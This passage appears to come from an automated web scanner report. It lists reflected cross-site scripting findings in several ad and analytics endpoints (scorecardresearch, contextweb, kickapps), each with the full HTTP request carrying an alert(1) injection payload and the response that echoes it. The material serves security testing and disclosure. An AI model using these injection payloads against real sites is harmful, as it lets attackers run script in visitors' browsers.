D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"68206483fefc<script>alert(1)</script>27501cbb4f9", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 8693d<script>alert(1)</script>cfac32cb3dd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=18693d<script>alert(1)</script>cfac32cb3dd&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"18693d<script>alert(1)</script>cfac32cb3dd", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 1b888<script>alert(1)</script>766fa601906 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=1b888<script>alert(1)</script>766fa601906&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"1b888<script>alert(1)</script>766fa601906", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7ff5d<script>alert(1)</script>d1dbf6139c2 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=7ff5d<script>alert(1)</script>d1dbf6139c2&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"", c5:"7ff5d<script>alert(1)</script>d1dbf6139c2", c6:"", c10:"", c15:"", c16:"", r:""});



1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload b35d1<script>alert(1)</script>a08224be487 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6=b35d1<script>alert(1)</script>a08224be487 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"", c5:"", c6:"b35d1<script>alert(1)</script>a08224be487", c10:"", c15:"", c16:"", r:""});



1.63. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 161ef'%3balert(1)//69af9548b0 was submitted in the admeld_adprovider_id parameter. This input was echoed as 161ef';alert(1)//69af9548b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8161ef'%3balert(1)//69af9548b0&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:45 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 189
Date: Mon, 11 Apr 2011 16:31:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8161ef';alert(1)//69af9548b0&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');

1.64. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1900b'%3balert(1)//92af6dcc53a was submitted in the admeld_callback parameter. This input was echoed as 1900b';alert(1)//92af6dcc53a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match1900b'%3balert(1)//92af6dcc53a HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:47 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Mon, 11 Apr 2011 16:31:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match1900b';alert(1)//92af6dcc53a?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');

1.65. http://clientapps.kickapps.com/hearst/articleTitles.php [as parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the as request parameter is copied into a JavaScript rest-of-line comment. The payload 67904%0aalert(1)//1bfa9df98ab was submitted in the as parameter. This input was echoed as 67904
alert(1)//1bfa9df98ab
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=6297667904%0aalert(1)//1bfa9df98ab&lSize=4&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:20 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 1003

//http://serve.a-feed.com/service/getFeed.kickAction?as=6297667904
alert(1)//1bfa9df98ab
&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
/**
Array
(
[url] => http://cdnse
...[SNIP]...

1.66. http://clientapps.kickapps.com/hearst/articleTitles.php [divName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the divName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f338'%3balert(1)//2266b1d758d was submitted in the divName parameter. This input was echoed as 7f338';alert(1)//2266b1d758d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4&divName=kickapps_mostcommented7f338'%3balert(1)//2266b1d758d&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:42 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 889

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
var title_container = document.getElementById('kickapps_mostcommented7f338';alert(1)//2266b1d758d');
if (title_container!=null){
   title_container.innerHTML='<span id="ka_article_titles">
...[SNIP]...

1.67. http://clientapps.kickapps.com/hearst/articleTitles.php [lSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the lSize request parameter is copied into a JavaScript rest-of-line comment. The payload a6a6a%0aalert(1)//8cda9d9ad91 was submitted in the lSize parameter. This input was echoed as a6a6a
alert(1)//8cda9d9ad91
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4a6a6a%0aalert(1)//8cda9d9ad91&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:33 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 14087

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4a6a6a
